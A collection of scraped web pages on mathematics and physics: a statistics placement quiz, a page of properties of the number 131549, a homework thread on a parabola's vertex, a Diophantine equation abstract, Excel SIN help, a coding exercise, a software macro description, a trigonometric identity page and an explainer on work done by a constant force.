] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8020657,"math_prob":0.9998975,"size":2303,"snap":"2019-51-2020-05","text_gpt3_token_len":792,"char_repetition_ratio":0.123096995,"word_repetition_ratio":0.0,"special_character_ratio":0.39513677,"punctuation_ratio":0.10835215,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9999939,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T10:20:40Z\",\"WARC-Record-ID\":\"<urn:uuid:696d402b-a7fe-469d-8c3b-33794b87d6e4>\",\"Content-Length\":\"40747\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:297e3b50-3013-4be0-8c39-5e9fdcf4c0f4>\",\"WARC-Concurrent-To\":\"<urn:uuid:c036cd27-95e8-463c-93ca-249881e5c39e>\",\"WARC-IP-Address\":\"54.221.217.175\",\"WARC-Target-URI\":\"https://socratic.org/questions/597cae97b72cff300c577dac\",\"WARC-Payload-Digest\":\"sha1:ONH6FQ6ZPR7VROZPIMEOXNLPSIYZCEGI\",\"WARC-Block-Digest\":\"sha1:LNRJZ3QLT2F6TCUTBQWYKDGUNUKOCKHM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540586560.45_warc_CC-MAIN-20191214094407-20191214122407-00444.warc.gz\"}"} |
https://www.hindawi.com/journals/mpe/2013/979035/ | [
"Special Issue\n\n## Fuzzy Computing and Intelligent Transportation\n\nView this Special Issue\n\nResearch Article | Open Access\n\nVolume 2013 |Article ID 979035 | https://doi.org/10.1155/2013/979035\n\nWei Hu, Junpeng Bao, \"The Outlier Interval Detection Algorithms on Astronautical Time Series Data\", Mathematical Problems in Engineering, vol. 2013, Article ID 979035, 6 pages, 2013. https://doi.org/10.1155/2013/979035\n\n# The Outlier Interval Detection Algorithms on Astronautical Time Series Data\n\nAccepted11 Feb 2013\nPublished19 Mar 2013\n\n#### Abstract\n\nThe Outlier Interval Detection is a crucial technique to analyze spacecraft fault, locate exception, and implement intelligent fault diagnosis system. The paper proposes two OID algorithms on astronautical Time Series Data, that is, variance based OID (VOID) and FFT and nearest Neighbour based OID (FKOID). The VOID algorithm divides TSD into many intervals and measures each interval’s outlier score according to its variance. This algorithm can detect the outlier intervals with great fluctuation in the time domain. It is a simple and fast algorithm with less time complexity, but it ignores the frequency information. The FKOID algorithm extracts the frequency information of each interval by means of Fast Fourier Transform, so as to calculate the distances between frequency features, and adopts the KNN method to measure the outlier score according to the sum of distances between the interval’s frequency vector and the nearest frequency vectors. It detects the outlier intervals in a refined way at an appropriate expense of the time and is valid to detect the outlier intervals in both frequency and time domains.\n\n#### 1. Introduction\n\nThe Time Series Data is a sequence of values observed in some periods. Usually, it takes a long time to continuously observe an object and record its data so the accumulated TSD is often in a very large amount. A significant issue is that how to mine latent or interesting knowledge from the huge amount of TSD and apply what is mined to the future. The Astronautical data (AD) is a typical big TSD, which is gathered by frequently and continuously observing spacecrafts. The AD mining techniques have many significant applications, including but not limited to analyzing satellites’ working status, judging faults/errors, and forecasting its next state in the near future. Since it is hard to touch or measure spacecrafts in a shouting distance. The technique to detect outlier intervals from AD is important. The outlier intervals are the exceptional or unusual parts in a long period of the TSD, which cover abundant information about spacecraft faults or special events. The Outlier Interval Detection technique can provide foundation proofs for intelligent astronautical fault analysis, diagnosis and prediction.\n\nAlthough, most spacecrafts work well in most of their lives, the faults and abnormal situations take place occasionally. Namely, the outlier intervals are always drowned in long pieces of regular data. Obviously, it is a very tough mission for a person to find out outliers and make out regulations from the huge AD. Human experts will spend not only plenty of efforts and time, but also some luck. This paper proposes two algorithms to automatically detect the outlier intervals in AD by means of data mining. 
These algorithms not only are able to promote analysis efficiency and raise the diagnosis system's response performance, but can also be used to support spacecraft fault prediction and diagnosis systems as well as astronautical intelligent monitoring systems. Additionally, the OID technique has a great perspective in the areas of industrial production process monitoring, financial administration, medical data analysis, disaster alarm, network intrusion detection, credit card fraud detection, and so forth.\n\nGenerally, there are four ways to implement Outlier Interval Detection, that is, the distance based approach, the statistic based approach, the deviation based approach, and the clustering based approach.\n\n(1) The distance based OID calculates the distance between objects first, and then the outliers are defined as the objects whose distances to others exceed the given threshold [1]. This is a popular approach because it is simple and easy to implement and does not require knowledge of the data distribution in advance.\n\nAngiulli et al. have done a lot of research on this approach [2–5]. Angiulli and Pizzuti [2] defined an object's outlier score as the sum of distances between the object and its k nearest neighbors. They also introduced the notion of an outlier detection solving set [3], a subset of the data set, to improve the distance based outlier detection performance. Angiulli and Fassetti proposed the DOLPHIN algorithm [4] to carry out distance based outlier detection in large databases. Later, they proposed a new model [5] that considers only the sum of the distances between the object and the others in the sliding window.\n\nChen et al. [6] proposed a rough set and K Nearest Neighbor (KNN) based method to detect the outliers on mixed continuous and discrete datasets. Bhaduri and Matthews [7] introduced two distributed algorithms and a novel indexing scheme to speed up distance based outlier detection. Li et al. [8] transformed interval values into real values and then employed the KNN approach to find outliers.\n\n(2) The statistic based OID approach requires knowledge of the probability distribution of the data in advance, which is the foundation of the approach. But for a specific sample space, it is usually hard to know the exact distribution of the data. The key work of the approach is to perform plenty of tests in order to get the most proper distribution model. For example, Takeuchi and Yamanishi [9] proposed a unifying framework that employed a Gaussian mixture model for statistical outlier detection.\n\n(3) The deviation based OID extracts the main features of the center objects, and then the outliers are considered as the objects whose features deviate from the centers remarkably. For example, Oliveira and Meira [10] proposed a neural network method to forecast the thresholds for detecting outliers.\n\n(4) The clustering based OID considers the outliers as the by-products of clustering [11], that is, the objects that do not belong to any normal cluster.\n\nSome OID methods exploit the Fourier Transform and the Wavelet Transform to extract data features and mine the outliers in a special domain. For example, Rasheed et al. [14] proposed a Fast Fourier Transform and Inverse Fast Fourier Transform based OID method. Grané and Veiga [15] propose a Wavelet Transform based method to detect outliers in financial data.\n\n#### 3. The Outlier Interval Detection\n\n##### 3.1. The Solo Variant TSD and the Outlier Interval\n\nThe solo variant TSD is the observed value of a single object or attribute in a period. 
Generally, a long period of TSD is divided into many intervals according to the time scale. Thus an interval is a piece of time and the values in that range. The time span of each interval can be equal, such as a day, a week, or 10 days. Some applications may employ unequal intervals. But in this paper, a TSD is divided into intervals of identical length.\n\nThe OID of the solo variant aims to find out the oddest outlier intervals from a long period of solo variant TSD, such as the changes of a satellite battery's voltage in a year. An outlier interval indicates that the variant varies abnormally in the time span, so that it deserves special care. It often reflects some event that happened or the symptoms of a fault. The reason for the abnormal data may be diverse, such as device fault, external interference, changes of temperature, and so forth. Figure 1 illustrates some examples of the outlier interval where the 3rd, 4th, 9th, and 10th intervals are apparently different from others.\n\n##### 3.2. The Variance Based Outlier Interval Detection\n\nIn a real astronautical dataset, the abnormally varying data often result in a great fluctuation amplitude. The degree of the amplitude can be directly reflected by the variance in the interval. Namely, the outlier score can be measured by the variance. The higher the value of the variance is, the odder the interval. It is easy to mine the top oddest intervals by means of sorting their variances in descending order.\n\nThe time complexity of the standard variance definition is O(2n), where n is the number of data, because it traverses the whole sequence twice. For a huge amount of AD, it is better to execute a faster algorithm with a smaller time complexity. We transform the standard variance definition to the form given in (1). Both results are identical, but (1) needs only one traverse, so its time complexity is O(n):\n\n$\mathrm{Var}(X) = \frac{1}{n}\sum_{i=1}^{n} x_i^2 - \left(\frac{1}{n}\sum_{i=1}^{n} x_i\right)^2$   (1)\n\nPseudocode 1 is the pseudo code of the VOID.\n\nInput: S is the TSD, and m is the count of the intervals.\nOutput: The top outlier intervals in time domain and their scores.\n(1) I = {I_1, ..., I_m} is the set of intervals divided from S\n(2) for each I_k in I\n(3)   compute score_k = Var(I_k) with the one-pass form (1)\n(4)   record (I_k, score_k)\n(5) endfor\n(6) sort the intervals by score_k in descending order and output the top ones\n\nThe time complexity of the VOID is O(n), where n is the number of data in the TSD.\n\n##### 3.3. FFT and K Nearest Neighbour Based Outlier Interval Detection\n\nThe VOID algorithm can quickly detect the outlier intervals in time domain. However, many real AD are periodical to some extent. Violent frequency fluctuations also imply that something happened. On the other hand, violent fluctuations in time domain lead to changes in frequency domain. Figure 2 illustrates the frequency spectra of the twelve intervals of the data shown in Figure 1. It is clear that the frequency fluctuations in the 3rd, 4th, 9th, and 10th intervals are distinctly greater than others.\n\nIn order to detect the outliers at a fine granularity, more frequencies have to be taken into account. So a feature vector of an interval is made of the whole frequency band from the lowest frequency to the highest. The outlier score of an interval is measured according to the distance between feature vectors instead of the variance. Moreover, an amplitude threshold is set to suppress noise: the value is assigned 0 if it is not higher than the threshold; otherwise it keeps its value.\n\nThe FKOID algorithm firstly divides the whole TSD into intervals equally. 
Secondly, it executes FFT on each interval to get the frequency spectrum of the interval, which builds a feature vector after the low-energy frequencies are set to 0 by the amplitude threshold. Thirdly, the Euclidean distances between every pair of feature vectors are calculated. It should be noted that some frequencies may have an extremely large amplitude, so that they are overwhelming in the vector. That would cover the effect of the other frequencies in terms of Euclidean distance. So we set a top threshold to limit the maximum amplitude value of those overwhelming frequencies. At last, the outlier score of an interval is the sum of distances between the interval's feature vector and its K nearest neighbors.\n\nThe idea of the FKOID is inspired by the method of Grané and Veiga [15]. The longer the vector's distance is, the odder the interval is. Pseudocode 2 is the pseudo code of the FKOID.\n\nInput: S is the TSD, m is the count of the intervals, and θ_low, θ_top are the amplitude thresholds.\nOutput: The top outlier intervals and their scores.\n(1) I = {I_1, ..., I_m} is the set of intervals divided from S\n(2) for each I_k in I\n(3)   F_k = FFT(I_k), with amplitudes below θ_low set to 0 and amplitudes above θ_top capped, as the feature vector\n(4) endfor\n(5) for each F_k\n(6)   score_k = the sum of Euclidean distances from F_k to its K nearest feature vectors\n(7) endfor\n(8) sort the intervals by score_k in descending order and output the top ones\n\nThe FKOID algorithm has to maintain a distance matrix and fetch the K nearest neighbors of each interval. The time complexity of that is O(m²n + mK), where K is the number of nearest neighbors, n is the number of data in an interval, and m is the count of intervals. Since the first stage is the Fast Fourier Transform of each interval, the entire time complexity of the FKOID is O(mn log n + m²n + mK).\n\n#### 4. Experimental Results\n\nWe use six real astronautical datasets to test the algorithms. As shown in Figure 3, these AD represent some popular tendencies in the real world. The data of (a), (b), and (c) have distinct violent fluctuations in time domain. The data of (e) and (f) have no great fluctuation in time domain. The data of (d) is the most complicated, containing diverse variation tendencies. Figure 3 illustrates the top 4 outlier intervals detected by the VOID algorithm, and Figure 4 shows the results of the FKOID, respectively. Table 1 lists the detailed outlier scores on the 6 AD.\n\nTable 1: the top-4 outlier scores on the 6 AD (the index of the outlier interval in parentheses).\nVOID (Figure 3):\n(a) 1.2001(3), 1.0300(9), 0.6976(10), 0.3677(4)\n(b) 1.7812(4), 1.6907(9), 1.4850(3), 1.3747(10)\n(c) 131.66(3), 77.06(10), 72.81(9), 21.37(2)\n(d) 135.83(5), 128.09(10), 127.37(3), 110.52(9)\n(e) 0.0076(5), 0.0062(1), 0.0055(4), 0.0055(9)\n(f) 5.4093(10), 5.3548(7), 5.3369(8), 5.1904(9)\nFKOID (Figure 4):\n(a) 7211(3), 6515(9), 6027(10), 4862(4)\n(b) 9013(3), 8856(9), 7145(10), 5746(4)\n(c) 28163(3), 28083(9), 26842(10), 18941(2)\n(d) 39757(5), 39619(2), 39182(1), 38768(4)\n(e) 60.94(4), 55.02(1), 53.10(5), 53.03(9)\n(f) 1479(1), 1306(10), 1149(7), 1096(2)\n\nBased on the experimental results, the VOID algorithm fits the case in which the data varies slightly in the regular situation but becomes violent in the irregular situation. If the normal data fluctuates frequently and varies widely, then the VOID algorithm will have a great error. Additionally, the VOID algorithm is suitable for detecting OID in time domain, but fails in the case that data varies peacefully in time domain but violently in frequency domain.\n\nThe FKOID algorithm can solve the problem of OID in frequency domain. It is shown in Figure 4 that the violent fluctuations in time domain have corresponding abnormal changes in the frequency domain. As a result, the FKOID algorithm can detect outlier intervals in time domain as well (a compact runnable sketch of both detectors appears after this record). 
However, the FKOID algorithm can detect the very subtle outliers at the expense of long running time because it has a high time complexity.\n\n#### 5. Conclusions\n\nThe OID technique can quickly deal with TSD to find the oddest objects, which often imply crucial exceptional events. It has a great perspective in astronautical applications, such as the spacecraft fault prediction and diagnosis system, the astronautical intelligent monitoring system, and other systems based on TSD.\n\nThis paper proposes two algorithms to detect the outlier intervals on astronautical data. The VOID algorithm directly exploits the variance of data to quickly detect the outlier intervals in time domain. The FKOID employs the full frequency band to build a feature vector of an interval and measures the outlier score by the distance sum of the K nearest neighbors. The FKOID is subtle enough to detect the outliers at a refined granularity in both frequency and time domains, but its time complexity is somewhat high.\n\nHowever, the above algorithms are based on identical interval lengths. That is rather arbitrary in practice because the real outlier intervals may vary in length. So our next work is to study methods for unequal-length Outlier Interval Detection.\n\n#### Acknowledgments\n\nThis research is supported by National Natural Science Foundation of China (Grant 60903123) and the Baidu Theme Research Plan on Large Scale Machine Learning and Data Mining.\n\n1. E. Knorr, R. Ng, and V. Tucakov, “Distance-based outliers: algorithms and applications,” VLDB Journal, vol. 8, no. 3, pp. 237–253, 2000. View at: Google Scholar\n2. F. Angiulli and C. Pizzuti, “Outlier mining in large high-dimensional data sets,” IEEE Transactions on Knowledge and Data Engineering, vol. 17, no. 2, pp. 203–215, 2005. View at: Google Scholar\n3. F. Angiulli, S. Basta, and C. Pizzuti, “Distance-based detection and prediction of outliers,” IEEE Transactions on Knowledge and Data Engineering, vol. 18, no. 2, pp. 145–160, 2006. View at: Google Scholar\n4. F. Angiulli and F. Fassetti, “An efficient algorithm for mining distance-based outliers in very large datasets,” ACM Transactions on Knowledge Discovery from Data, vol. 3, no. 1, pp. 1–57, 2009. View at: Google Scholar\n5. F. Angiulli and F. Fassetti, “Distance-based outlier queries in data streams: the novel task and algorithms,” Data Mining and Knowledge Discovery, vol. 20, no. 2, pp. 290–324, 2010. View at: Publisher Site | Google Scholar | MathSciNet\n6. Y. Chen, D. Miao, and H. Zhang, “Neighborhood outlier detection,” Expert Systems with Applications, vol. 37, no. 12, pp. 8745–8749, 2010. View at: Google Scholar\n7. K. Bhaduri and B. L. Matthews, “Algorithms for speeding up distance-based outlier detection,” in Proceedings of the 17th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD '11), pp. 859–867, 2011. View at: Google Scholar\n8. S. Li, R. Lee, and S. D. Lang, “Detecting outliers in interval data,” in Proceedings of the Southeast regional conference (ACM-SE '06), pp. 290–295, 2006. View at: Google Scholar\n9. J. Takeuchi and K. Yamanishi, “A unifying framework for detecting outliers and change points from non-stationary time series data,” IEEE Transactions on Knowledge and Data Engineering, vol. 18, no. 4, pp. 482–492, 2006. View at: Google Scholar\n10. A. Oliveira and S. Meira, “Detecting novelties in time series through neural networks forecasting with robust confidence intervals,” Neurocomputing, vol. 70, no. 1–3, pp. 79–92, 2006. 
View at: Google Scholar\n11. C. Böhm, C. Faloutsos, and C. Plant, “Outlier-robust clustering using independent components,” in Proceedings of the 28th ACM SIGMOD International Conference on Management of Data (SIGMOD '08), pp. 185–198, 2008. View at: Google Scholar\n12. N. Abe and B. Zadrozny, “Outlier detection by active learning,” in Proceedings of the 12th ACM SIGMOD International Conference on Management of Data (SIGMOD '06), pp. 504–509, 2006. View at: Google Scholar\n13. C. Franke and M. Gertz, “ORDEN: outlier region detection and exploration in sensor networks,” in Proceedings of the 29th ACM SIGMOD International Conference on Management of Data (SIGMOD '09), pp. 1075–1078, 2009. View at: Google Scholar\n14. F. Rasheed et al., “Fourier transform based spatial outlier mining,” Lecture Notes in Computer Science, pp. 317–324, 2009. View at: Google Scholar\n15. A. Grané and H. Veiga, “Wavelet-based detection of outliers in financial time series,” Computational Statistics & Data Analysis, vol. 54, no. 11, pp. 2580–2593, 2010. View at: Publisher Site | Google Scholar | MathSciNet"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.89622736,"math_prob":0.92257273,"size":17293,"snap":"2022-05-2022-21","text_gpt3_token_len":3748,"char_repetition_ratio":0.15154144,"word_repetition_ratio":0.06270154,"special_character_ratio":0.21604118,"punctuation_ratio":0.13380498,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9771279,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T12:25:25Z\",\"WARC-Record-ID\":\"<urn:uuid:d47e4999-940a-42e9-9033-e364699ebf91>\",\"Content-Length\":\"532048\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d9abe5b9-92cc-4146-9259-b05ad2b3d6d6>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff8fc379-3612-4ad5-8885-7936fd3c5714>\",\"WARC-IP-Address\":\"18.67.65.91\",\"WARC-Target-URI\":\"https://www.hindawi.com/journals/mpe/2013/979035/\",\"WARC-Payload-Digest\":\"sha1:EAYX7LHQAXJ2KERNOSKS2TYWCATO7OYO\",\"WARC-Block-Digest\":\"sha1:6UOYRYPNAGHVBOPO6S6FC3U3MVC4KRC5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510117.12_warc_CC-MAIN-20220516104933-20220516134933-00194.warc.gz\"}"} |
https://chemistry.stackexchange.com/questions/66949/demonstrating-decomposition-of-hydrogen-peroxide-using-ironiii-nitrate-catalys | [
"# Demonstrating decomposition of hydrogen peroxide using iron(III) nitrate catalyst\n\nI need a way to prove/show that hydrogen peroxide was decomposed through use of catalyst.\n\nI want to ensure that my catalyst: $\\ce{Fe(NO3)3}$ or iron(III) nitrate is a catalyst, not a reactant/ consumed during the reaction.\n\n$$\\ce{2 H2O2 (aq) ->[Fe(NO3)3 (s)] 2 H2O (l) + O2 (g)}$$\n\n• When the reaction is happening, I will introduce a wooden glowing splint over the bubbling reaction and the wooden splint glowing brighter or reigniting will show that oxygen is being produced.",
null,
"Question:\n\n• Now, how do I show that water is produced? Would I just boil the product I get after reaction (image above) and put cobalt chloride paper at the water vapour?\n\n• Also, if I were to use the orange solution above again as a catalyst (since it still contains iron(III) nitrate), would hydrogen peroxide decompose again? If so, is there a way to put iron(III) nitrate back to its solid state? or any way to reuse as catalyst?\n\nEdit:\n\nIf it is easier to answer, it doesn't have to be with iron(III) nitrate. I have an option to use manganese dioxide, which is another catalyst that I can substitute for iron(III) nitrate. I think it should be OK since it does the exact same reaction.\n\nDetection of oxygen: Detection of $\\ce{O2}$ by a glowing splint is a good way to detect the oxygen. Also you could capture the gas by a simple fixture e.g.",
null,
and demonstrate the volume change in the receiver. This way you can actually measure the moles of $\ce{O2}$ produced (by $PV=nRT$) and then the moles of $\ce{H2O2}$ decomposed, stoichiometrically, by the formula you've written (a numeric sketch of this gas-law step appears after this record).\n\nChoice of catalyst: Using $\ce{MnO2}$ would be better if you want to make sure you have a catalyst. $\ce{MnO2}$ will not be consumed during the decomposition; I'm not sure about iron(III) nitrate.\n\nOr, detecting change in $\ce{Fe(NO3)3}$ concentration: Addition of a very small concentration of potassium thiocyanate, $\ce{KSCN}$ (say 1/100 of your $\ce{Fe^{3+}}$ concentration), will yield a deep red product, iron thiocyanate ($\ce{Fe(SCN)^{2+}}$). If you have access to a spectrometer you can measure the absorbance of the initial solution's product and the product after decomposing $\ce{H2O2}$.\n\nProve water was produced: The best way I can think of is to measure the (subtle) change of density of your solution before and after decomposition. Using $\ce{MnO2}$ would make this easy because you can remove/filter it as a solid after decomposition and thus measure the mass/volume of your solution before and after. $\ce{H2O2}$ and $\ce{H2O}$ have close albeit detectably different densities at RT. $\ce{H2O2}$ is more dense than water, so your density should decrease.\n\n• How would I remove/filter manganese dioxide as a solid from water? Is there any specific equipment? Or can I just boil it to remove water? – didgocks Jan 25 '17 at 12:22\n• Just filter paper through a funnel, maybe a vacuum if you want to be thorough. – khaverim Jan 25 '17 at 16:02\n• Would there be a way to prove water for iron(III) nitrate? – didgocks Jan 25 '17 at 20:50\n• You can probably still detect a small decrease in density even with iron(III) nitrate in solution – khaverim Jan 25 '17 at 20:54\n\nYes, apart from potassium iodide, which is commonly used as a catalyst in the decomposition of hydrogen peroxide, $\ce{Fe^3+}$ salts, manganese dioxide and nickel hydroxide can be used as alternative catalysts. Since iron nitrate contains $\ce{Fe^3+}$, it can be used as a catalyst.\n\nThere are some papers that discuss the use of $\ce{Fe^3+}$ salts as catalysts. Following is the relevant information from the papers:\n\nWe should consider the role of the Ferric Chloride ($\ce{FeCl3}$) as catalyst in the decomposition reaction of hydrogen peroxide.(...) The fact that iron can exist in two different oxidation states, $\ce{Fe^2+}$ (Ferrous) and $\ce{Fe^3+}$ (Ferric), allows the catalyst to break the reaction into two different redox steps, each of which has a lower energy barrier to completion than the uncatalyzed reaction:\n\n$$\ce{H2O2(aq) + 2Fe^3+(aq) -> O2(g) + 2 Fe^2+(aq) + 2H+(aq)}$$ $$\ce{H2O2(aq) + 2 Fe^2+(aq) + 2 H+ (aq) -> 2 H2O(l) + 2Fe^3+(aq)}$$\n\nNote the first step in the catalyzed reaction involves reduction of the Ferric Ion ($\ce{Fe^3+}$) to the Ferrous Ion ($\ce{Fe^2+}$), which is then re-oxidized to Ferric Ion ($\ce{Fe^3+}$) in the second step. Hence, on net, the catalyst is not consumed during the course of the decomposition.\n\n$\ce{Fe^3+}$ ions actually act as a homogeneous catalyst. 
The catalytic decomposition of hydrogen peroxide can be essentially explained by two different mechanisms based on the mutual redox transitions Fe(III)/Fe(V) (KREMER-STEIN mechanism) and Fe(III)/Fe(II) (HABER-WEISS mechanism), respectively.\n\nAccording to the mechanism proposed by KREMER and STEIN, an intermediate oxygen complex of iron with oxidation number +V is primarily formed by the reaction of $\ce{Fe^3+}$ with $\ce{H2O2}$. This complex reacts with another $\ce{H2O2}$ molecule to give water and oxygen, thereby reforming $\ce{Fe^3+}$.\n\n$$\ce{Fe^3+ + H2O2 <=> [Fe^{III}OOH]^2+ + H+ <=> [Fe^{V}O]^3+ + H2O ->[H2O2] Fe^3+ + 2H2O + O2}$$\n\nAccording to the mechanism proposed by HABER and WEISS, the $\ce{Fe^3+}$ ions initiate a radical reaction, after which the chain reaction consumes the hydrogen peroxide. This mechanism can explain the high reaction rate very well.\n\nChain initiation: $\ce{Fe^3+ + H2O2 <=> [Fe^{III}OOH]^2+ + H+ <=> Fe^2+ + HOO. + H+}$\n\nChain propagation: $\ce{Fe^2+ + H2O2 -> Fe^3+ + OH- + OH.}$ $\ce{H2O2 + OH. -> HOO. + H2O}$ $\ce{Fe^3+ + HOO. -> Fe^2+ + H+ + O2}$"
] | [
null,
"https://i.stack.imgur.com/dlkku.jpg",
null,
"https://i.stack.imgur.com/8SF3A.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8573365,"math_prob":0.99130887,"size":2733,"snap":"2019-51-2020-05","text_gpt3_token_len":864,"char_repetition_ratio":0.15060462,"word_repetition_ratio":0.023809524,"special_character_ratio":0.30406147,"punctuation_ratio":0.089108914,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99570537,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,6,null,6,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-28T08:24:18Z\",\"WARC-Record-ID\":\"<urn:uuid:cdea033b-246c-4bae-ac8a-4b84d3bf15b6>\",\"Content-Length\":\"146643\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bce21323-e832-4233-bead-eb5ce5d49bcc>\",\"WARC-Concurrent-To\":\"<urn:uuid:1987de92-ccde-42d1-97c0-7cb0a499cee3>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://chemistry.stackexchange.com/questions/66949/demonstrating-decomposition-of-hydrogen-peroxide-using-ironiii-nitrate-catalys\",\"WARC-Payload-Digest\":\"sha1:JSLHENP54V5VGKF2VYGHOZAV2DDZW6PV\",\"WARC-Block-Digest\":\"sha1:CAKNDTUSZW6EHVKL4QQYAE6FAIJTRW3S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251776516.99_warc_CC-MAIN-20200128060946-20200128090946-00470.warc.gz\"}"} |
https://ebrary.net/153909/mathematics/expectation_value_physical_observable | [
"# Expectation Value of a Physical Observable\n\nConsider a physical observable F defined by its quantum mechanical operator F, and the evolution of the system is described by a Hamiltonian H with the basis vectors |Ф„), defined by the eigenvalue equation:",
null,
"From quantum mechanics, the diagonal matrix element F„„ is described by the following equation",
null,
"with Ф„({q Ф„), and Ф* (q) = (Ф„ |q). The matrix element F„„ in 14.4 permits to evaluate the expectation value of the physical observable F quantized as an operator F:",
null,
"or",
null,
"So, for a mixed state the expectation value of the physical observable F is written as:",
null,
"We see that it has two averaging procedures, one is the usual quantum mechanical average procedure in 14.4 and the other is the classical averaging of multiplying the probability of being in a state by the value of being in that state as in 14.5 as well as in 14.6.\n\n# Density Matrix\n\nIn relation 14.7, it is obvious that the quantity",
null,
"Since the coefficients W„ are real then p(q,q') is obviously a Hermitian operator and so can be diagonalized. Here, p{q,q') is the so-called density matrix in the coordinate representation - a fundamental quantity that is the summit in quantum statistical mechanics from where all concepts are derived as well as the concepts of thermal equilibrium and temperature T clarified. This requires the definition of the weighted function of eigenstates for any operator,",
null,
"This is the so-called statistical density matrix (that is positive definite) in the coordinate representation that is the matrix element of the density operator and also determines the thermal average of the particle density of a quantum-statistical system:",
null,
"In relation 14.9, the quantities and W„ are the eigenfunctions and eigenvalues of p indicative that p(q,q') corresponds to a mixture of pure states of the wave functions VJq) with the respective weights W„. In 14.10, |4'„){4(n| can be interpreted as the probability distribution of the system in the eigenstate |4,„), while W„, the normalized probability to encounter the system in the state |VF„). So, p{q,q') should be the normalized average particle density in space. The advantage of working with p{q,q') rather than the wave functions is that we can more easily treat an infinite volume that avoids the complications of the boundaries of the system. For the evaluation of the partition function Z by explicit calculation of we must take a large, but finite volume. It is instructive to note that at low temperatures, only the lowest energy state survives and p(q,q') achieves the particle distribution at the ground state. At high temperatures, quantum effects are expected to be irrelevant and we therefore expect matrix density p(q,q') to imitate that of a classical particle distribution.\n\nThe expression 14.9 applies generally to a mixed state. The physical sense of the density operator in 14.10 entails that for any Hermitian operator p we may always find such a representation, say |^Р(), for which it is diagonalized. From 14.10, we may reformulate quantum mechanics: Any system is described by the density matrix in 14.10 with\n\n(a) |*Fj) being some complete orthonormal set of vectors and the probability W, has the following properties:",
null,
"(b) For a given operator, F the quantum mechanical-statistical expectation value can be found via a trace, for any representation,",
null,
"Since {'P,|f|'P,) is the expectation value of F in the state I'P,) then from a) to d) the density matrix pti in the diagonal 14* f) representation is, simply, interpreted as the probability of the system to be found in the state |4*,). Generally, deriving the density matrix from 14.10 as well as in 14.13 we do not define concretely the exact diagonal representation and at least suppose they exist. If all but one of the W, is zero, then the system is in the pure state :",
null,
"and otherwise it is in the mixed state. So, the density matrix handles both pure and mixed states."
] | [
null,
"https://ebrary.net/htm/img/33/1408/1307.png",
null,
"https://ebrary.net/htm/img/33/1408/1308.png",
null,
"https://ebrary.net/htm/img/33/1408/1309.png",
null,
"https://ebrary.net/htm/img/33/1408/1310.png",
null,
"https://ebrary.net/htm/img/33/1408/1311.png",
null,
"https://ebrary.net/htm/img/33/1408/1312.png",
null,
"https://ebrary.net/htm/img/33/1408/1313.png",
null,
"https://ebrary.net/htm/img/33/1408/1314.png",
null,
"https://ebrary.net/htm/img/33/1408/1315.png",
null,
"https://ebrary.net/htm/img/33/1408/1316.png",
null,
"https://ebrary.net/htm/img/33/1408/1317.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.91644084,"math_prob":0.9928393,"size":3916,"snap":"2022-40-2023-06","text_gpt3_token_len":864,"char_repetition_ratio":0.14621677,"word_repetition_ratio":0.01236476,"special_character_ratio":0.22318693,"punctuation_ratio":0.10381077,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99813324,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-30T22:08:54Z\",\"WARC-Record-ID\":\"<urn:uuid:d077be63-1896-40b3-9c4b-920da88a2b5b>\",\"Content-Length\":\"33080\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1c88c157-eb37-49b2-ac32-3dde3f185dcf>\",\"WARC-Concurrent-To\":\"<urn:uuid:af4f7c90-884e-4931-ab67-ee9cee4e7630>\",\"WARC-IP-Address\":\"5.45.72.163\",\"WARC-Target-URI\":\"https://ebrary.net/153909/mathematics/expectation_value_physical_observable\",\"WARC-Payload-Digest\":\"sha1:OOMTJJJURZ4HZUEEEPJUQZTOKVO5O2R2\",\"WARC-Block-Digest\":\"sha1:RPNOZQVS3RWFSIXDSIC5RNKQKIYGQMWI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030335504.37_warc_CC-MAIN-20220930212504-20221001002504-00066.warc.gz\"}"} |
https://www.soladisinstitute.fr/en/evaluation/ | [
